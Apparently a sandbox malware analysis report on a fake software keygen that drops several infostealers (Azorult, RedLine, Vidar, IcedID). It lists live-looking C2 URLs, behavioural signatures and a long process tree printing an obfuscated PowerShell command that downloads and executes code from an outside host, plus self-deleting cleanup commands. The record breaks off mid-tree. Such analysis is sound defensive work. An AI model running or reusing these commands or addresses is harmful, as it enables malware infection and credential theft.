Analysis

  • max time kernel
    95s
  • max time network
    303s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    10-04-2021 05:39

General

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

icedid

Campaign

1925120085

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 8 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 5 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 3 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks for any installed AV software in registry 1 TTPs 64 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 20 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 17 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 7 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 15 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Script User-Agent 15 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1116
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1304
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2704
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2684
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2592
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2420
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2388
              • C:\Users\Admin\AppData\Local\Temp\Maxwell.Render.Plug.in.V3.2.0.serial.number.maker.exe
                "C:\Users\Admin\AppData\Local\Temp\Maxwell.Render.Plug.in.V3.2.0.serial.number.maker.exe"
                1⤵
                • Suspicious use of WriteProcessMemory
                PID:1152
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2712
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                    keygen-pr.exe -p83fsase3Ge
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:4088
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of WriteProcessMemory
                      PID:3096
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                        5⤵
                        • Executes dropped EXE
                        PID:2668
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                    keygen-step-1.exe
                    3⤵
                    • Executes dropped EXE
                    PID:1128
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                    keygen-step-3.exe
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:3148
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3716
                      • C:\Windows\SysWOW64\PING.EXE
                        ping 1.1.1.1 -n 1 -w 3000
                        5⤵
                        • Runs ping.exe
                        PID:1128
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                    keygen-step-4.exe
                    3⤵
                    • Executes dropped EXE
                    • Checks computer location settings
                    • Suspicious use of WriteProcessMemory
                    PID:2284
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:3916
                      • C:\Users\Admin\AppData\Local\Temp\QL00KN8C4N\multitimer.exe
                        "C:\Users\Admin\AppData\Local\Temp\QL00KN8C4N\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                        5⤵
                        • Executes dropped EXE
                        • Maps connected drives based on registry
                        • Drops file in Windows directory
                        • Enumerates system info in registry
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1296
                        • C:\Users\Admin\AppData\Local\Temp\QL00KN8C4N\multitimer.exe
                          "C:\Users\Admin\AppData\Local\Temp\QL00KN8C4N\multitimer.exe" 1 3.1618033168.60713a10d1e12 101
                          6⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          PID:4336
                          • C:\Users\Admin\AppData\Local\Temp\QL00KN8C4N\multitimer.exe
                            "C:\Users\Admin\AppData\Local\Temp\QL00KN8C4N\multitimer.exe" 2 3.1618033168.60713a10d1e12
                            7⤵
                            • Executes dropped EXE
                            • Checks for any installed AV software in registry
                            PID:4728
                            • C:\Users\Admin\AppData\Local\Temp\fdkqkwlbqoj\d3w4yzp5cbx.exe
                              "C:\Users\Admin\AppData\Local\Temp\fdkqkwlbqoj\d3w4yzp5cbx.exe" /VERYSILENT
                              8⤵
                              • Executes dropped EXE
                              • Suspicious use of SetWindowsHookEx
                              PID:5156
                              • C:\Users\Admin\AppData\Local\Temp\is-INUHK.tmp\d3w4yzp5cbx.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-INUHK.tmp\d3w4yzp5cbx.tmp" /SL5="$C01D0,140785,56832,C:\Users\Admin\AppData\Local\Temp\fdkqkwlbqoj\d3w4yzp5cbx.exe" /VERYSILENT
                                9⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SetWindowsHookEx
                                PID:5212
                                • C:\Users\Admin\AppData\Local\Temp\is-DP70D.tmp\apipostback.exe
                                  "C:\Users\Admin\AppData\Local\Temp\is-DP70D.tmp\apipostback.exe" adan adan
                                  10⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of SetWindowsHookEx
                                  PID:5660
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\RZ8c832fe.dll"
                                    11⤵
                                      PID:5348
                                      • C:\Windows\SysWOW64\regsvr32.exe
                                        regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\RZ8c832fe.dll"
                                        12⤵
                                        • Loads dropped DLL
                                        PID:5572
                                        • C:\Windows\system32\regsvr32.exe
                                          /s "C:\Users\Admin\AppData\Local\Temp\RZ8c832fe.dll"
                                          13⤵
                                          • Loads dropped DLL
                                          PID:5136
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\RZ8c832fe.dllCkUtwNf18.dll"
                                      11⤵
                                        PID:208
                                        • C:\Windows\SysWOW64\regsvr32.exe
                                          regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\RZ8c832fe.dllCkUtwNf18.dll"
                                          12⤵
                                            PID:2288
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                          11⤵
                                            PID:1656
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                              12⤵
                                              • Blocklisted process makes network request
                                              PID:5412
                                    • C:\Users\Admin\AppData\Local\Temp\f1dem3r3a14\Setup3310.exe
                                      "C:\Users\Admin\AppData\Local\Temp\f1dem3r3a14\Setup3310.exe" /Verysilent /subid=577
                                      8⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetWindowsHookEx
                                      PID:5360
                                      • C:\Users\Admin\AppData\Local\Temp\is-I641K.tmp\Setup3310.tmp
                                        "C:\Users\Admin\AppData\Local\Temp\is-I641K.tmp\Setup3310.tmp" /SL5="$402A8,138429,56832,C:\Users\Admin\AppData\Local\Temp\f1dem3r3a14\Setup3310.exe" /Verysilent /subid=577
                                        9⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SetWindowsHookEx
                                        PID:5624
                                        • C:\Users\Admin\AppData\Local\Temp\is-0IOLM.tmp\Setup.exe
                                          "C:\Users\Admin\AppData\Local\Temp\is-0IOLM.tmp\Setup.exe" /Verysilent
                                          10⤵
                                          • Executes dropped EXE
                                          • Drops file in Program Files directory
                                          • Suspicious use of SetWindowsHookEx
                                          PID:4276
                                          • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe
                                            "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"
                                            11⤵
                                            • Executes dropped EXE
                                            • Adds Run key to start application
                                            • Suspicious use of SetWindowsHookEx
                                            PID:4264
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              12⤵
                                                PID:4952
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                12⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetWindowsHookEx
                                                PID:6516
                                            • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe
                                              "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"
                                              11⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetWindowsHookEx
                                              PID:5020
                                              • C:\Users\Admin\AppData\Roaming\CleanerTools\winxsl.exe
                                                "C:\Users\Admin\AppData\Roaming\CleanerTools\winxsl.exe"
                                                12⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                • Suspicious use of SetWindowsHookEx
                                                PID:5884
                                                • C:\Users\Admin\AppData\Roaming\CleanerTools\winxsl.exe
                                                  "C:\Users\Admin\AppData\Roaming\CleanerTools\winxsl.exe"
                                                  13⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Checks processor information in registry
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:5752
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im winxsl.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Roaming\CleanerTools\winxsl.exe" & del C:\ProgramData\*.dll & exit
                                                    14⤵
                                                      PID:6776
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im winxsl.exe /f
                                                        15⤵
                                                        • Kills process with taskkill
                                                        PID:4784
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /t 6
                                                        15⤵
                                                        • Delays execution with timeout.exe
                                                        PID:7908
                                              • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe
                                                "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"
                                                11⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetWindowsHookEx
                                                PID:5652
                                              • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe
                                                "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"
                                                11⤵
                                                • Executes dropped EXE
                                                • Drops file in Program Files directory
                                                • Modifies registry class
                                                • Suspicious use of SetWindowsHookEx
                                                PID:5552
                                                • C:\Windows\SysWOW64\WScript.exe
                                                  "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
                                                  12⤵
                                                    PID:5752
                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                      13⤵
                                                      • Loads dropped DLL
                                                      PID:5644
                                                • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe
                                                  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"
                                                  11⤵
                                                  • Executes dropped EXE
                                                  PID:5476
                                                  • C:\Users\Admin\AppData\Local\Temp\YMV6CVYIOQ\multitimer.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\YMV6CVYIOQ\multitimer.exe" 0 306065bb10421b26.04333812 0 103
                                                    12⤵
                                                    • Executes dropped EXE
                                                    PID:6384
                                                    • C:\Users\Admin\AppData\Local\Temp\YMV6CVYIOQ\multitimer.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\YMV6CVYIOQ\multitimer.exe" 1 3.1618033199.60713a2f18cae 103
                                                      13⤵
                                                      • Executes dropped EXE
                                                      • Adds Run key to start application
                                                      PID:6836
                                                      • C:\Users\Admin\AppData\Local\Temp\YMV6CVYIOQ\multitimer.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\YMV6CVYIOQ\multitimer.exe" 2 3.1618033199.60713a2f18cae
                                                        14⤵
                                                        • Executes dropped EXE
                                                        • Checks for any installed AV software in registry
                                                        PID:7100
                                                        • C:\Users\Admin\AppData\Local\Temp\3hpbdgplt10\wpkjmxo2c2b.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\3hpbdgplt10\wpkjmxo2c2b.exe" /ustwo INSTALL
                                                          15⤵
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:6312
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 648
                                                            16⤵
                                                            • Program crash
                                                            PID:3080
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 664
                                                            16⤵
                                                            • Program crash
                                                            PID:4280
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 764
                                                            16⤵
                                                            • Program crash
                                                            PID:7848
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 812
                                                            16⤵
                                                            • Program crash
                                                            PID:7772
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 884
                                                            16⤵
                                                            • Program crash
                                                            PID:2720
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 900
                                                            16⤵
                                                            • Program crash
                                                            PID:7660
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 1116
                                                            16⤵
                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                            • Program crash
                                                            PID:8036
                                                        • C:\Users\Admin\AppData\Local\Temp\d023wnobwce\Setup3310.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\d023wnobwce\Setup3310.exe" /Verysilent /subid=577
                                                          15⤵
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:6892
                                                          • C:\Users\Admin\AppData\Local\Temp\is-BESLO.tmp\Setup3310.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-BESLO.tmp\Setup3310.tmp" /SL5="$402C8,138429,56832,C:\Users\Admin\AppData\Local\Temp\d023wnobwce\Setup3310.exe" /Verysilent /subid=577
                                                            16⤵
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4184
                                                            • C:\Users\Admin\AppData\Local\Temp\is-RMQ1V.tmp\Setup.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\is-RMQ1V.tmp\Setup.exe" /Verysilent
                                                              17⤵
                                                              • Drops file in Program Files directory
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:7888
                                                        • C:\Users\Admin\AppData\Local\Temp\g50q0jfgrs5\app.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\g50q0jfgrs5\app.exe" /8-23
                                                          15⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:5228
                                                          • C:\Users\Admin\AppData\Local\Temp\g50q0jfgrs5\app.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\g50q0jfgrs5\app.exe" /8-23
                                                            16⤵
                                                              PID:5668
                                                          • C:\Users\Admin\AppData\Local\Temp\vnze0ythanr\vpn.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\vnze0ythanr\vpn.exe" /silent /subid=482
                                                            15⤵
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5280
                                                            • C:\Users\Admin\AppData\Local\Temp\is-MBVPU.tmp\vpn.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-MBVPU.tmp\vpn.tmp" /SL5="$60442,15170975,270336,C:\Users\Admin\AppData\Local\Temp\vnze0ythanr\vpn.exe" /silent /subid=482
                                                              16⤵
                                                              • Loads dropped DLL
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:4500
                                                          • C:\Users\Admin\AppData\Local\Temp\52couqyblxy\setup_10.2_us3.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\52couqyblxy\setup_10.2_us3.exe" /silent
                                                            15⤵
                                                              PID:8684
                                                      • C:\Users\Admin\AppData\Local\Temp\XQJF8ZXDYX\setups.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\XQJF8ZXDYX\setups.exe" ll
                                                        12⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:6480
                                                        • C:\Users\Admin\AppData\Local\Temp\is-5D8PK.tmp\setups.tmp
                                                          "C:\Users\Admin\AppData\Local\Temp\is-5D8PK.tmp\setups.tmp" /SL5="$60084,1873631,71168,C:\Users\Admin\AppData\Local\Temp\XQJF8ZXDYX\setups.exe" ll
                                                          13⤵
                                                          • Executes dropped EXE
                                                          • Checks computer location settings
                                                          • Loads dropped DLL
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:6588
                                                    • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe
                                                      "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                      11⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:4160
                                                      • C:\Users\Admin\AppData\Local\Temp\is-G72JL.tmp\LabPicV3.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-G72JL.tmp\LabPicV3.tmp" /SL5="$1046C,136934,53248,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                        12⤵
                                                          PID:5228
                                                          • C:\Users\Admin\AppData\Local\Temp\is-LQ9T7.tmp\alpATCHInO.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\is-LQ9T7.tmp\alpATCHInO.exe" /S /UID=lab214
                                                            13⤵
                                                            • Drops file in Drivers directory
                                                            • Executes dropped EXE
                                                            • Adds Run key to start application
                                                            • Drops file in Program Files directory
                                                            PID:6220
                                                            • C:\Program Files\Windows Portable Devices\UDLAXYHSUV\prolab.exe
                                                              "C:\Program Files\Windows Portable Devices\UDLAXYHSUV\prolab.exe" /VERYSILENT
                                                              14⤵
                                                              • Executes dropped EXE
                                                              • Checks computer location settings
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:6128
                                                              • C:\Users\Admin\AppData\Local\Temp\is-IM6E6.tmp\prolab.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-IM6E6.tmp\prolab.tmp" /SL5="$E04E6,575243,216576,C:\Program Files\Windows Portable Devices\UDLAXYHSUV\prolab.exe" /VERYSILENT
                                                                15⤵
                                                                • Executes dropped EXE
                                                                • Drops file in Program Files directory
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:5200
                                                            • C:\Users\Admin\AppData\Local\Temp\11-45349-918-74f9f-df027c485f148\Degozhiwebo.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\11-45349-918-74f9f-df027c485f148\Degozhiwebo.exe"
                                                              14⤵
                                                              • Executes dropped EXE
                                                              • Checks computer location settings
                                                              PID:6584
                                                            • C:\Users\Admin\AppData\Local\Temp\6b-a28c0-1f7-ad0bd-d968b18d56c47\Tarydycaepi.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\6b-a28c0-1f7-ad0bd-d968b18d56c47\Tarydycaepi.exe"
                                                              14⤵
                                                                PID:6768
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ovgm2dux.bvz\gaooo.exe & exit
                                                                  15⤵
                                                                    PID:6224
                                                                    • C:\Windows\System32\Conhost.exe
                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      16⤵
                                                                        PID:2288
                                                                      • C:\Users\Admin\AppData\Local\Temp\ovgm2dux.bvz\gaooo.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\ovgm2dux.bvz\gaooo.exe
                                                                        16⤵
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:7540
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          17⤵
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:7896
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          17⤵
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:6084
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\11vtwjil.xqo\jg8_8qyu.exe & exit
                                                                      15⤵
                                                                        PID:7220
                                                                        • C:\Users\Admin\AppData\Local\Temp\11vtwjil.xqo\jg8_8qyu.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\11vtwjil.xqo\jg8_8qyu.exe
                                                                          16⤵
                                                                          • Checks whether UAC is enabled
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:7488
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ndqtqss.541\google-game.exe & exit
                                                                        15⤵
                                                                          PID:4792
                                                                          • C:\Users\Admin\AppData\Local\Temp\1ndqtqss.541\google-game.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\1ndqtqss.541\google-game.exe
                                                                            16⤵
                                                                            • Drops file in Program Files directory
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:7532
                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                              "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                              17⤵
                                                                              • Loads dropped DLL
                                                                              PID:7236
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4gol1eis.bno\Sabor.exe & exit
                                                                          15⤵
                                                                            PID:6212
                                                                            • C:\Users\Admin\AppData\Local\Temp\4gol1eis.bno\Sabor.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\4gol1eis.bno\Sabor.exe
                                                                              16⤵
                                                                                PID:6276
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z0ruhxqk.opy\BarSetpFile.exe /silent & exit
                                                                              15⤵
                                                                                PID:7248
                                                                                • C:\Users\Admin\AppData\Local\Temp\z0ruhxqk.opy\BarSetpFile.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\z0ruhxqk.opy\BarSetpFile.exe /silent
                                                                                  16⤵
                                                                                    PID:6672
                                                                                    • C:\ProgramData\2363979.exe
                                                                                      "C:\ProgramData\2363979.exe"
                                                                                      17⤵
                                                                                        PID:428
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\01vdqdhl.vii\wwfvd.exe & exit
                                                                                    15⤵
                                                                                      PID:4544
                                                                                      • C:\Users\Admin\AppData\Local\Temp\01vdqdhl.vii\wwfvd.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\01vdqdhl.vii\wwfvd.exe
                                                                                        16⤵
                                                                                        • Checks processor information in registry
                                                                                        PID:4732
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im wwfvd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\01vdqdhl.vii\wwfvd.exe" & del C:\ProgramData\*.dll & exit
                                                                                          17⤵
                                                                                            PID:7620
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /im wwfvd.exe /f
                                                                                              18⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:8788
                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                              timeout /t 6
                                                                                              18⤵
